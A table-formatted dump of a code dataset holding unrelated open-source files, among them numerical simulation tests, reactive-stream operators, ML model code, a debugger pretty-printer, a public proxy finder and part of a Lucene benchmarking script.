max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
Projects/Random_Quotes_Website/quotes/__init__.py | ieternalleo/AlgoCode | 151 | 12696767 | <gh_stars>100-1000
#This file may not be empty so i can easily upload it to github |
wavetorch/operators.py | Kshitiz-Bansal/wavetorch | 470 | 12696772 | <filename>wavetorch/operators.py
import torch
from torch.nn.functional import conv2d
def _laplacian(y, h):
"""Laplacian operator"""
operator = h ** (-2) * torch.tensor([[[[0.0, 1.0, 0.0], [1.0, -4.0, 1.0], [0.0, 1.0, 0.0]]]])
y = y.unsqueeze(1)
# y = pad(y,pad=(0,0,1,1), mode='circular')
# y = pad(y,pad=(1,1,0,0),mode='circular')
return conv2d(y, operator, padding=1).squeeze(1)
|
applications/DEMApplication/tests/test_DEM_3D_contact.py | lkusch/Kratos | 778 | 12696811 | <filename>applications/DEMApplication/tests/test_DEM_3D_contact.py<gh_stars>100-1000
import os
import KratosMultiphysics
from KratosMultiphysics import Logger
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
import KratosMultiphysics.DEMApplication as DEM
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics.DEMApplication.DEM_analysis_stage
import auxiliary_functions_for_tests
this_working_dir_backup = os.getcwd()
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class DEM3D_ContactTestSolution(KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage, KratosUnittest.TestCase):
@classmethod
def GetMainPath(self):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), "DEM3D_contact_tests_files")
def GetProblemNameWithPath(self):
return os.path.join(self.main_path, self.DEM_parameters["problem_name"].GetString())
def FinalizeSolutionStep(self):
super().FinalizeSolutionStep()
tolerance = 1.001
for node in self.rigid_face_model_part.Nodes:
dem_pressure = node.GetSolutionStepValue(DEM.DEM_PRESSURE)
contact_force = node.GetSolutionStepValue(DEM.CONTACT_FORCES_Z)
if node.Id == 9:
if self.time > 0.35:
self.assertAlmostEqual(dem_pressure, 1621, delta=tolerance)
self.assertAlmostEqual(contact_force, -6484, delta=tolerance)
if node.Id == 13:
if self.time > 0.35:
self.assertAlmostEqual(dem_pressure, 841, delta=tolerance)
self.assertAlmostEqual(contact_force, -3366, delta=tolerance)
def Finalize(self):
self.procedures.RemoveFoldersWithResults(str(self.main_path), str(self.problem_name), '')
super().Finalize()
class TestDEM3DContact(KratosUnittest.TestCase):
def setUp(self):
pass
@classmethod
def test_DEM3D_contact(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "DEM3D_contact_tests_files")
parameters_file_name = os.path.join(path, "ProjectParametersDEM.json")
model = KratosMultiphysics.Model()
# Test parallel computation.
with open(parameters_file_name,'r') as parameter_file:
project_parameters = KratosMultiphysics.Parameters(parameter_file.read())
DEM3D_ContactTestSolution(model, project_parameters).Run()
if __name__ == "__main__":
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
KratosUnittest.main()
|
rx/core/operators/flatmap.py | mmpio/RxPY | 4,342 | 12696840 | <reponame>mmpio/RxPY<gh_stars>1000+
import collections
from typing import Callable, Optional
from rx import from_, from_future, operators as ops
from rx.core import Observable
from rx.core.typing import Mapper, MapperIndexed
from rx.internal.utils import is_future
def _flat_map_internal(source, mapper=None, mapper_indexed=None):
def projection(x, i):
mapper_result = mapper(x) if mapper else mapper_indexed(x, i)
if is_future(mapper_result):
result = from_future(mapper_result)
elif isinstance(mapper_result, collections.abc.Iterable):
result = from_(mapper_result)
else:
result = mapper_result
return result
return source.pipe(
ops.map_indexed(projection),
ops.merge_all()
)
def _flat_map(mapper: Optional[Mapper] = None) -> Callable[[Observable], Observable]:
def flat_map(source: Observable) -> Observable:
"""One of the Following:
Projects each element of an observable sequence to an observable
sequence and merges the resulting observable sequences into one
observable sequence.
Example:
>>> flat_map(source)
Args:
source: Source observable to flat map.
Returns:
An operator function that takes a source observable and returns
an observable sequence whose elements are the result of invoking
the one-to-many transform function on each element of the
input sequence .
"""
if callable(mapper):
ret = _flat_map_internal(source, mapper=mapper)
else:
ret = _flat_map_internal(source, mapper=lambda _: mapper)
return ret
return flat_map
def _flat_map_indexed(mapper_indexed: Optional[MapperIndexed] = None) -> Callable[[Observable], Observable]:
def flat_map_indexed(source: Observable) -> Observable:
"""One of the Following:
Projects each element of an observable sequence to an observable
sequence and merges the resulting observable sequences into one
observable sequence.
Example:
>>> flat_map_indexed(source)
Args:
source: Source observable to flat map.
Returns:
An observable sequence whose elements are the result of invoking
the one-to-many transform function on each element of the input
sequence.
"""
if callable(mapper_indexed):
ret = _flat_map_internal(source, mapper_indexed=mapper_indexed)
else:
ret = _flat_map_internal(source, mapper=lambda _: mapper_indexed)
return ret
return flat_map_indexed
def _flat_map_latest(mapper: Mapper) -> Callable[[Observable], Observable]:
def flat_map_latest(source: Observable) -> Observable:
"""Projects each element of an observable sequence into a new
sequence of observable sequences by incorporating the element's
index and then transforms an observable sequence of observable
sequences into an observable sequence producing values only
from the most recent observable sequence.
Args:
source: Source observable to flat map latest.
Returns:
An observable sequence whose elements are the result of
invoking the transform function on each element of source
producing an observable of Observable sequences and that at
any point in time produces the elements of the most recent
inner observable sequence that has been received.
"""
return source.pipe(
ops.map(mapper),
ops.switch_latest()
)
return flat_map_latest
|
textclf/data/raw.py | lswjkllc/textclf | 146 | 12696845 | import os
from tabulate import tabulate
from textclf.data.dictionary import Dictionary, LabelDictionary
from textclf.config import PreprocessConfig
from textclf.utils.raw_data import (
tokenize_file,
create_tokenizer,
get_label_prob,
build_label2id
)
class TextClfRawData(object):
"""对数据进行预处理。分词、构建词典、保存成二进制形式方便读入"""
def __init__(self, config: PreprocessConfig):
"""
:param config:预处理的设置
:type config: PreprocessConfig
"""
self.config = config
self.tokenizer = create_tokenizer(config.tokenizer)
self.train_pairs = tokenize_file(
os.path.join(config.datadir, config.train_file),
self.tokenizer
)
self.valid_pairs = tokenize_file(
os.path.join(config.datadir, config.valid_file),
self.tokenizer
)
self.test_pairs = tokenize_file(
os.path.join(config.datadir, config.test_file),
self.tokenizer
)
self.dictionary = self._build_dictionary()
self.label2id = build_label2id([label for _, label in self.train_pairs])
def _build_dictionary(self):
dictionary = Dictionary()
for text, _ in self.train_pairs:
dictionary.add_sentence(text) # build dict
dictionary.finalize(
nwords=self.config.nwords,
threshold=self.config.min_word_count
)
return dictionary
def describe(self):
"""输出数据的信息:类别分布、字典大小
"""
headers = [
"",
self.config.train_file,
self.config.valid_file,
self.config.test_file
]
train_label_prob = get_label_prob([label for _, label in self.train_pairs])
valid_label_prob = get_label_prob([label for _, label in self.valid_pairs])
test_label_prob = get_label_prob([label for _, label in self.test_pairs])
label_table = []
for label in train_label_prob:
label_table.append([
label,
train_label_prob[label],
valid_label_prob[label],
test_label_prob[label]
])
label_table.append([
"Sum",
len(self.train_pairs),
len(self.valid_pairs),
len(self.test_pairs)
])
print("Label Prob:")
print(tabulate(label_table, headers, tablefmt="grid", floatfmt=".4f"))
print(f"Dictionary Size: {len(self.dictionary)}")
|
resources/enoki_gdb.py | njroussel/enoki | 115 | 12696873 | <gh_stars>100-1000
###############################################################################
# GDB Script to improve introspection of array types when debugging software
# using Enoki. Copy this file to "~/.gdb" (creating the directory, if not
# present) and then apppend the following line to the file "~/.gdbinit"
# (again, creating it if, not already present):
###############################################################################
# set print pretty
# source ~/.gdb/enoki_gdb.py
###############################################################################
import gdb
simple_types = {
'bool',
'char', 'unsigned char',
'short', 'unsigned short',
'int', 'unsigned int',
'long', 'unsigned long',
'long long', 'unsigned long long',
'float', 'double'
}
class EnokiIterator:
def __init__(self, instance, size):
self.instance = instance
self.size = size
self.index = 0
def __iter__(self):
return self
def __next__(self):
if self.index >= self.size:
raise StopIteration
result = ('[%i]' % self.index, self.instance[self.index])
self.index += 1
return result
def next(self):
return self.__next__()
class EnokiStaticArrayPrinter:
def __init__(self, instance):
self.instance = instance
itype = self.instance.type.strip_typedefs()
# Extract derived type
if 'StaticArrayImpl' in str(itype):
itype = itype.template_argument(3)
try:
data = self.instance['m_data']['_M_elems']
self.data_type = data.type.strip_typedefs().target()
except Exception:
self.data_type = itype.template_argument(0)
# Determine the size and data type
self.size = int(str(itype.template_argument(1)))
self.is_simple = str(self.data_type) in simple_types
self.type_size = self.data_type.sizeof
self.is_mask = 'Mask' in str(itype)
try:
_ = instance['k']
self.kmask = True
except Exception:
self.kmask = False
def entry(self, i):
if i < 0 or i >= self.size:
return None
addr = int(self.instance.address) + self.type_size * i
cmd = '*((%s *) 0x%x)' % (str(self.data_type), addr)
return str(gdb.parse_and_eval(cmd))
def children(self):
if self.is_simple:
return []
else:
return EnokiIterator(self.instance['m_data']['_M_elems'], self.size)
def to_string(self):
if self.is_simple:
if not self.is_mask:
result = [self.entry(i) for i in range(self.size)]
else:
if self.kmask:
# AVX512 mask register
result = list(reversed(format(int(self.instance['k']), '0%ib' % self.size)))
else:
result = [None] * self.size
for i in range(self.size):
value = self.entry(i)
result[i] = '0' if (value == '0' or value == 'false') else '1'
return '[' + ', '.join(result) + ']'
else:
return ''
class EnokiDynamicArrayPrinter:
def __init__(self, instance):
self.instance = instance
itype = self.instance.type.strip_typedefs()
self.size = int(str(self.instance['m_size']))
self.packet_count = int(str(self.instance['m_packets_allocated']))
self.packet_type = itype.template_argument(0)
self.packet_size = self.packet_type.sizeof
self.data = int(str(instance['m_packets']['_M_t']['_M_t']['_M_head_impl']), 0)
self.limit = 20
def to_string(self):
values = []
for i in range(self.packet_count):
addr = int(self.data) + self.packet_size * i
cmd = '*((%s *) 0x%x)' % (str(self.packet_type), addr)
value = str(gdb.parse_and_eval(cmd))
assert value[-1] == ']'
values += value[value.rfind('[')+1:-1].split(', ')
if len(values) > self.size:
values = values[0:self.size]
break
if len(values) > self.limit:
break
if len(values) > self.limit:
values = values[0:self.limit]
values.append(".. %i skipped .." % (self.size - self.limit))
return '[' + ', '.join(values) + ']'
# Static Enoki arrays
regexp_1 = r'(enoki::)?(Array|Packet|Complex|Matrix|' \
'Quaternion|StaticArrayImpl)(Mask)?<.+>'
# Mitsuba 2 is one of the main users of Enoki. For convenience, also
# declare its custom array types here
regexp_2 = r'(mitsuba::)?(Vector|Point|Normal|Spectrum|Color)<.+>'
regexp_combined = r'^(%s)|(%s)$' % (regexp_1, regexp_2)
p = gdb.printing.RegexpCollectionPrettyPrinter("enoki")
p.add_printer("static", regexp_combined, EnokiStaticArrayPrinter)
p.add_printer("dynamic", r'^(enoki::)?DynamicArray(Impl)?<.+>$', EnokiDynamicArrayPrinter)
o = gdb.current_objfile()
gdb.printing.register_pretty_printer(o, p)
|
market_maker/utils/errors.py | mwithi/sample-market-maker | 1,524 | 12696898 | <gh_stars>1000+
class AuthenticationError(Exception):
pass
class MarketClosedError(Exception):
pass
class MarketEmptyError(Exception):
pass
|
gdmix-trainer/src/gdmix/factory/driver_factory.py | Kostyansa/gdmix | 130 | 12696926 | import logging
from gdmix.drivers.fixed_effect_driver import FixedEffectDriver
from gdmix.drivers.random_effect_driver import RandomEffectDriver
from gdmix.factory.model_factory import ModelFactory
from gdmix.util import constants
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class DriverFactory:
"""
Provider class for creating driver and dependencies
NOTE - for now, only Estimator-based linear models are supported. In the future, the factory will also
accept model type as an input parameter
"""
@staticmethod
def get_driver(base_training_params, raw_model_params):
"""
Create driver and associated dependencies, based on type. Only linear, estimator-based models supported
for now
:param base_training_params: Parsed base training parameters common to all models. This could including
path to training data, validation data, metadata file path, learning rate etc.
:param raw_model_params: Raw model parameters, representing model-specific requirements. For example, a
CNN might expose filter_size as a parameter, a text-based model might expose the size it's word embedding matrix
as a parameter
:return: Fixed or Random effect driver
"""
driver = DriverFactory.drivers[base_training_params.stage]
model = ModelFactory.get_model(base_training_params, raw_model_params)
logger.info(f"Instantiating model {model} and driver {driver}")
return driver(base_training_params=base_training_params, model=model)
drivers = {constants.FIXED_EFFECT: FixedEffectDriver, constants.RANDOM_EFFECT: RandomEffectDriver}
|
tensor2tensor/models/video/basic_recurrent.py | jaseweir/tensor2tensor | 12,921 | 12696955 | <reponame>jaseweir/tensor2tensor<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Basic recurrent models for testing simple tasks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensor2tensor.layers import common_video
from tensor2tensor.models.video import basic_stochastic
from tensor2tensor.utils import registry
@registry.register_model
class NextFrameBasicRecurrent(
basic_stochastic.NextFrameBasicStochasticDiscrete):
"""Basic next-frame recurrent model."""
@property
def is_recurrent_model(self):
return True
def middle_network(self, layer, internal_states):
lstm_func = common_video.conv_lstm_2d
hp = self.hparams
lstm_states = internal_states
if lstm_states is None:
lstm_states = [None] * hp.num_lstm_layers
# LSTM layers
x = layer
for j in range(hp.num_lstm_layers):
x, lstm_states[j] = lstm_func(x, lstm_states[j], hp.num_lstm_filters)
return x, lstm_states
@registry.register_hparams
def next_frame_basic_recurrent():
"""Basic 2-frame recurrent model with stochastic tower."""
hparams = basic_stochastic.next_frame_basic_stochastic_discrete()
hparams.filter_double_steps = 2
hparams.hidden_size = 64
hparams.video_num_input_frames = 4
hparams.video_num_target_frames = 4
hparams.concat_internal_states = False
hparams.add_hparam("num_lstm_layers", 2)
hparams.add_hparam("num_lstm_filters", 256)
return hparams
|
src/kubetop/_twistmain.py | TheoBrigitte/kubetop | 154 | 12696959 | <reponame>TheoBrigitte/kubetop<gh_stars>100-1000
# Copyright Least Authority Enterprises.
# See LICENSE for details.
"""
Adapter from IServiceMaker-like interface to setuptools console-entrypoint
interface.
Premise
=======
Given:
* twist is the focus of efforts to make a good client-oriented command-line
driver for Twisted-based applications.
* kubetop is a client-y, command-line, Twisted-based application.
* Accounting for custom scripts in setup.py with setuptools is a lot harder
than just using the ``console_script`` feature.
Therefore:
* Implement application code to the twist interface.
* Build a single utility for adapting that interface to the ``console_script``
interface.
Theory of Operation
===================
#. Applications provide ``Options`` and ``makeService``, the main pieces of
``IServiceMaker``.
#. We provide an object which can be called as a ``console_script``
entrypoint.
#. That object hooks ``Options`` and ``makeService`` up to the internals of
``twist`` (which are *totally* private, sigh).
"""
from sys import stdout, argv
from os.path import expanduser
import attr
from twisted.application.twist import _options
from twisted.application.twist._twist import Twist
@attr.s(frozen=True)
class MainService(object):
tapname = "kubetop"
description = "kubetop"
options = attr.ib()
makeService = attr.ib()
@attr.s
class TwistMain(object):
options = attr.ib()
make_service = attr.ib()
exit_status = 0
exit_message = None
def exit(self, reason=None):
if reason is not None:
self.exit_status = 1
self.exit_message = reason.getTraceback()
from twisted.internet import reactor
reactor.stop()
def __call__(self):
_options.getPlugins = lambda iface: [
MainService(self.options, self._make_service),
]
t = Twist()
log_flag = u"--log-file"
log_file = u"~/.kubetop.log"
app_name = u"kubetop"
if str is bytes:
# sys.argv must be bytes Python 2
log_flag = log_flag.encode("ascii")
log_file = log_file.encode("ascii")
app_name = app_name.encode("ascii")
t.main([
argv[0],
log_flag, expanduser(log_file),
app_name,
] + argv[1:])
if self.exit_message:
stdout.write(self.exit_message)
raise SystemExit(self.exit_status)
def _make_service(self, options):
return self.make_service(self, options)
|
h2o-py/tests/testdir_apis/Data_Manipulation/pyunit_h2oH2OFrame_max_mean_median_min_large.py | vishalbelsare/h2o-3 | 6,098 | 12696979 | <reponame>vishalbelsare/h2o-3
from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.utils.typechecks import assert_is_type
from random import randrange
import numpy as np
from h2o.frame import H2OFrame
def h2o_H2OFrame_stats():
"""
Python API test: h2o.frame.H2OFrame.max(), h2o.frame.H2OFrame.mean(), h2o.frame.H2OFrame.median(),
h2o.frame.H2OFrame.min(),
"""
row_num = randrange(1,10)
col_num = randrange(1,10)
python_lists = np.random.randint(-5,5, (row_num, col_num))
h2oframe = h2o.H2OFrame(python_obj=python_lists)
assert abs(h2oframe.max()-np.ndarray.max(python_lists)) < 1e-12, "h2o.H2OFrame.max() command is not working."
assert abs(h2oframe.min()-np.ndarray.min(python_lists)) < 1e-12, "h2o.H2OFrame.min() command is not working."
h2oMean = h2oframe.mean(skipna=False, axis=0)
assert_is_type(h2oMean, H2OFrame)
numpmean = list(np.mean(python_lists, axis=0))
h2omean = h2oMean.as_data_frame(use_pandas=True, header=False)
assert pyunit_utils.equal_two_arrays(numpmean, h2omean.values.tolist()[0], 1e-12, 1e-6), "h2o.H2OFrame.mean() command is not working."
h2oMedian = h2oframe.median(na_rm=True)
assert_is_type(h2oMedian, list)
numpmedian = list(np.median(python_lists, axis=0))
assert pyunit_utils.equal_two_arrays(numpmedian, h2oMedian, 1e-12, 1e-6), "h2o.H2OFrame.median() command is not working."
pyunit_utils.standalone_test(h2o_H2OFrame_stats)
|
3]. Competitive Programming/03]. HackerRank/1]. Practice/10]. 30 Days of Code/Python/Day_08.py | Utqrsh04/The-Complete-FAANG-Preparation | 6,969 | 12696980 | # 9th Solutions
#--------------------------
n = int(input())
d = {}
for i in range(n):
x = input().split()
d[x[0]] = x[1]
while True:
try:
name = input()
if name in d:
print(name, '=', d[name], sep='')
else:
print('Not found')
except:
break
|
srunner/scenariomanager/actorcontrols/basic_control.py | aleallievi/scenario_runner | 447 | 12697011 | #!/usr/bin/env python
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides the base class for user-defined actor
controllers. All user-defined controls must be derived from
this class.
A user must not modify the module.
"""
class BasicControl(object):
"""
This class is the base class for user-defined actor controllers
All user-defined agents must be derived from this class.
Args:
actor (carla.Actor): Actor that should be controlled by the controller.
Attributes:
_actor (carla.Actor): Controlled actor.
Defaults to None.
_target_speed (float): Logitudinal target speed of the controller.
Defaults to 0.
_init_speed (float): Initial longitudinal speed of the controller.
Defaults to 0.
_waypoints (list of carla.Transform): List of target waypoints the actor
should travel along. A waypoint here is of type carla.Transform!
Defaults to [].
_waypoints_updated (boolean):
Defaults to False.
_reached_goal (boolean):
Defaults to False.
"""
_actor = None
_waypoints = []
_waypoints_updated = False
_target_speed = 0
_reached_goal = False
_init_speed = False
def __init__(self, actor):
"""
Initialize the actor
"""
self._actor = actor
def update_target_speed(self, speed):
"""
Update the actor's target speed and set _init_speed to False.
Args:
speed (float): New target speed [m/s].
"""
self._target_speed = speed
self._init_speed = False
def update_waypoints(self, waypoints, start_time=None):
"""
Update the actor's waypoints
Args:
waypoints (List of carla.Transform): List of new waypoints.
"""
self._waypoints = waypoints
self._waypoints_updated = True
def set_init_speed(self):
"""
Set _init_speed to True
"""
self._init_speed = True
def check_reached_waypoint_goal(self):
"""
Check if the actor reached the end of the waypoint list
returns:
True if the end was reached, False otherwise.
"""
return self._reached_goal
def reset(self):
"""
Pure virtual function to reset the controller. This should be implemented
in the user-defined agent implementation.
"""
raise NotImplementedError(
"This function must be re-implemented by the user-defined actor control."
"If this error becomes visible the class hierarchy is somehow broken")
def run_step(self):
"""
Pure virtual function to run one step of the controllers's control loop.
This should be implemented in the user-defined agent implementation.
"""
raise NotImplementedError(
"This function must be re-implemented by the user-defined actor control."
"If this error becomes visible the class hierarchy is somehow broken")
|
libs/proxy_harvester.py | Mr-Anonymous002/InstaReport | 109 | 12697024 | # coding=utf-8
#!/usr/bin/env python3
import asyncio
from proxybroker import Broker
from requests import get
from libs.utils import print_success
from libs.utils import print_error
from libs.utils import ask_question
from libs.utils import print_status
async def show(proxies, proxy_list):
while (len(proxy_list) < 50):
proxy = await proxies.get()
if proxy is None: break
print_success("[" + str(len(proxy_list) + 1) + "/50]", "Proxy found:", proxy.as_json()["host"] + ":" + str(proxy.as_json()["port"]))
proxy_list.append(
proxy.as_json()["host"] + ":" + str(proxy.as_json()["port"])
)
pass
pass
def find_proxies():
proxy_list = []
proxies = asyncio.Queue()
broker = Broker(proxies)
tasks = asyncio.gather(
broker.find(
types=['HTTPS'], limit=50), show(proxies, proxy_list)
)
loop = asyncio.get_event_loop()
loop.run_until_complete(tasks)
if (len(proxy_list) % 5 != 0 and len(proxy_list) > 5):
proxy_list = proxy_list[:len(proxy_list) - (len(proxy_list) % 5)]
return proxy_list |
data/migrations/test/test_db_config.py | giuseppe/quay | 2,027 | 12697028 | import pytest
from mock import patch
from data.runmigration import run_alembic_migration
from alembic.script import ScriptDirectory
from test.fixtures import *
@pytest.mark.parametrize(
"db_uri, is_valid",
[
("postgresql://devtable:password@quay-postgres/registry_database", True),
("postgresql://devtable:password%25@quay-postgres/registry_database", False),
("postgresql://devtable:password%%25@quay-postgres/registry_database", True),
("postgresql://devtable@db:password@quay-postgres/registry_database", True),
],
)
def test_alembic_db_uri(db_uri, is_valid):
"""
Test if the given URI is escaped for string interpolation (Python's configparser).
"""
with patch("alembic.script.ScriptDirectory.run_env") as m:
if is_valid:
run_alembic_migration(db_uri)
else:
with pytest.raises(ValueError):
run_alembic_migration(db_uri)
|
src/python/responseTimeTests.py | neoremind/luceneutil | 164 | 12697030 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import shutil
import time
import sys
import signal
import os
import subprocess
import sendTasks
import datetime
import traceback
import threading
import email.mime.text
import smtplib
def usage():
print
print 'Usage: python -u %s -config <config>.py [-smoke]' % sys.argv[0]
print
sys.exit(1)
SMOKE_TEST = '-smoke' in sys.argv
if '-help' in sys.argv:
usage()
try:
idx = sys.argv.index('-config')
except ValueError:
configFile = 'localconfig.py'
else:
configFile = sys.argv[idx+1]
exec(open(configFile).read())
LOGS_DIR = 'logs'
REMOTE_CLIENT = 'sendTasks.py'
SERVER_PORT = 7777
reSVNRev = re.compile(r'revision (.*?)\.')
class Tee(object):
def __init__(self, file, att):
self.file = file
self.att = att
self.orig = getattr(sys, att)
setattr(sys, att, self)
def __del__(self):
setattr(sys, self.att, self.orig)
def write(self, data):
self.file.write(data)
self.file.flush()
self.orig.write(data)
def captureEnv(logsDir):
print
print 'Started: %s' % datetime.datetime.now()
print 'Python version: %s' % sys.version
svnRev = os.popen('svnversion %s' % LUCENE_HOME).read().strip()
print 'Lucene svn rev is %s (%s)' % (svnRev, LUCENE_HOME)
if svnRev.endswith('M'):
if system('svn diff %s > %s/lucene.diffs 2>&1' % (LUCENE_HOME, logsDir)):
raise RuntimeError('svn diff failed')
os.chmod('%s/lucene.diffs' % logsDir, 0444)
luceneUtilDir = os.path.abspath(os.path.split(sys.argv[0])[0])
luceneUtilRev = os.popen('hg id %s' % luceneUtilDir).read().strip()
print 'Luceneutil hg rev is %s (%s)' % (luceneUtilRev, luceneUtilDir)
if luceneUtilRev.find('+') != -1:
if system('hg diff %s > %s/luceneutil.diffs 2>&1' % (luceneUtilDir, logsDir)):
raise RuntimeError('hg diff failed')
os.chmod('%s/luceneutil.diffs' % logsDir, 0444)
for fileName in ('responseTimeTests.py', TASKS_FILE, configFile):
shutil.copy('%s/%s' % (luceneUtilDir, fileName),
'%s/%s' % (logsDir, fileName))
os.chmod('%s/%s' % (logsDir, fileName), 0444)
for fileName in ('/sys/kernel/mm/transparent_hugepage/enabled',
'/sys/kernel/mm/redhat_transparent_hugepage/enabled'):
if os.path.exists(fileName):
s = open(fileName, 'rb').read().strip()
print 'Transparent huge pages @ %s: currently %s' % (fileName, s)
if not ENABLE_THP:
if s.find('[never]') == -1:
open(fileName, 'wb').write('never')
print ' now setting to [never]...'
else:
print ' already disabled'
else:
if s.find('[always]') == -1:
open(fileName, 'wb').write('always')
print ' now setting to [always]...'
else:
print ' already enabled'
def kill(name, p):
while True:
for l in os.popen('ps ww | grep %s | grep -v grep | grep -v /bin/sh' % name).readlines():
l2 = l.strip().split()
pid = int(l2[0])
print ' stop %s process %s: %s' % (name, pid, l.strip())
try:
os.kill(pid, signal.SIGKILL)
except OSError, e:
print ' OSError: %s' % str(e)
if p.poll() is not None:
print ' done killing "%s"' % name
return
time.sleep(2.0)
class TopThread(threading.Thread):
def __init__(self, logFileName):
threading.Thread.__init__(self)
self.logFileName = logFileName
self.stop = False
def run(self):
startTime = time.time()
f = open(self.logFileName, 'wb')
try:
while not self.stop:
# ps axuw | sed "1 d" | sort -n -r -k3 | head
# Run top every 3 sec:
for i in xrange(6):
if self.stop:
break
time.sleep(0.5)
f.write('\n\nTime %.1f s:\n' % (time.time() - startTime))
#p = os.popen('ps axuw | sed "1 d" | sort -n -r -k3')
sawHeader = False
p = os.popen('COLUMNS=10000 top -c -b -n1')
try:
keep = []
for l in p.readlines():
l = l.strip()
if l == '':
continue
if not sawHeader:
if l.find('PID') != -1:
sawHeader = True
tup = l.split()
cpuIDX = tup.index('%CPU')
memIDX = tup.index('%MEM')
keep.append(l)
continue
tup = l.split()
if float(tup[cpuIDX]) > 0 or float(tup[memIDX]) > 0.1:
keep.append(l)
f.write('\n'.join(keep))
finally:
p.close()
f.write('\n')
f.flush()
finally:
f.close()
def system(command):
#print ' run: %s' % command
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
output = p.communicate()[0].strip()
if len(output) > 0:
print ' %s' % output.replace('\n', '\n ')
return p.returncode
def runOne(startTime, desc, dirImpl, postingsFormat, targetQPS, pct=None):
if pct is not None:
details = ' autoPct=%s' % pct
else:
details = ''
print
print '%s: config=%s, dir=%s, postingsFormat=%s, QPS=%s %s' % \
(datetime.datetime.now(), desc, dirImpl, postingsFormat, targetQPS, details)
logsDir = '%s/%s.%s.%s.qps%s' % (LOGS_DIR, desc, dirImpl, postingsFormat, targetQPS)
if pct is not None:
logsDir += '.pct%s' % pct
if postingsFormat == 'Lucene41':
indexPath = LUCENE41_INDEX_PATH
else:
indexPath = DIRECT_INDEX_PATH
os.makedirs(logsDir)
finished = False
if desc.startswith('Zing'):
if DO_STOP_START_ZST:
while True:
if system('sudo service zing-memory start 2>&1'):
print 'Failed to start zing-memory... retry; java processes:'
system('ps axuw | grep java')
time.sleep(2.0)
else:
break
javaCommand = ZING_JVM
else:
if DO_STOP_START_ZST:
while True:
if system('sudo service zing-memory stop 2>&1'):
print 'Failed to stop zing-memory... retry; java processes:'
system('ps axuw | grep java')
time.sleep(2.0)
else:
break
javaCommand = ORACLE_JVM
command = []
w = command.append
w(javaCommand)
# w('-agentlib:yjpagent=sampling,disablej2ee,alloceach=10')
if desc.find('CMS') != -1:
w('-XX:+UseConcMarkSweepGC')
#w('-XX:PrintFLSStatistics=1')
if CMS_NEW_GEN_SIZE is not None:
w('-XX:NewSize=%s' % CMS_NEW_GEN_SIZE)
elif desc.find('G1') != -1:
w('-XX:+UnlockExperimentalVMOptions -XX:+UseG1GC')
if dirImpl == 'MMapDirectory' and postingsFormat == 'Lucene41':
w('-Xmx4g')
elif MAX_HEAP_GB is not None:
w('-Xms%sg' % MAX_HEAP_GB)
w('-Xmx%sg' % MAX_HEAP_GB)
w('-Xloggc:%s/gc.log' % logsDir)
if DO_ZV_ROBOT and desc.startswith('Zing'):
w('-XX:ARTAPort=8111')
w('-verbose:gc')
w('-XX:+PrintGCDetails')
w('-XX:+PrintGCTimeStamps')
w('-XX:+PrintHeapAtGC')
w('-XX:+PrintTenuringDistribution')
w('-XX:+PrintGCApplicationStoppedTime')
w('-XX:PrintCMSStatistics=2')
if desc.startswith('Zing'):
w('-XX:+PrintCommandLine')
w('-XX:+PrintCommandLineFlags')
#w('-XX:+PrintFlagsFinal')
cp = '.:$LUCENE_HOME/build/core/classes/java:$LUCENE_HOME/build/memory/classes/java:$LUCENE_HOME/build/codecs/classes/java:$LUCENE_HOME/build/highlighter/classes/java:$LUCENE_HOME/build/test-framework/classes/java:$LUCENE_HOME/build/queryparser/classes/java:$LUCENE_HOME/build/suggest/classes/java:$LUCENE_HOME/build/analysis/common/classes/java:$LUCENE_HOME/build/grouping/classes/java'.replace('$LUCENE_HOME', LUCENE_HOME)
if FRAGGER_JAR is not None:
cp = FRAGGER_JAR + ':' + cp
w('-cp')
w(cp)
w('perf.SearchPerfTest')
w('-indexPath %s' % indexPath)
if dirImpl == 'RAMDirectory' and postingsFormat == 'Direct':
# Leaves postings on disk (since they will be turned into
# DirectPF in RAM), and loads everything else into RAM:
w('-dirImpl RAMExceptDirectPostingsDirectory')
else:
w('-dirImpl %s' % dirImpl)
w('-analyzer %s' % ANALYZER)
w('-taskSource server:%s:%s' % (SERVER_HOST, SERVER_PORT))
w('-searchThreadCount %d' % SEARCH_THREAD_COUNT)
w('-field body')
w('-similarity DefaultSimilarity')
w('-commit %s' % COMMIT_POINT)
w('-seed 0')
w('-staticSeed 0')
w('-hiliteImpl %s' % HIGHLIGHT_IMPL)
w('-topN %d' % TOP_N)
serverLog = '%s/server.log' % logsDir
w('-log %s' % serverLog)
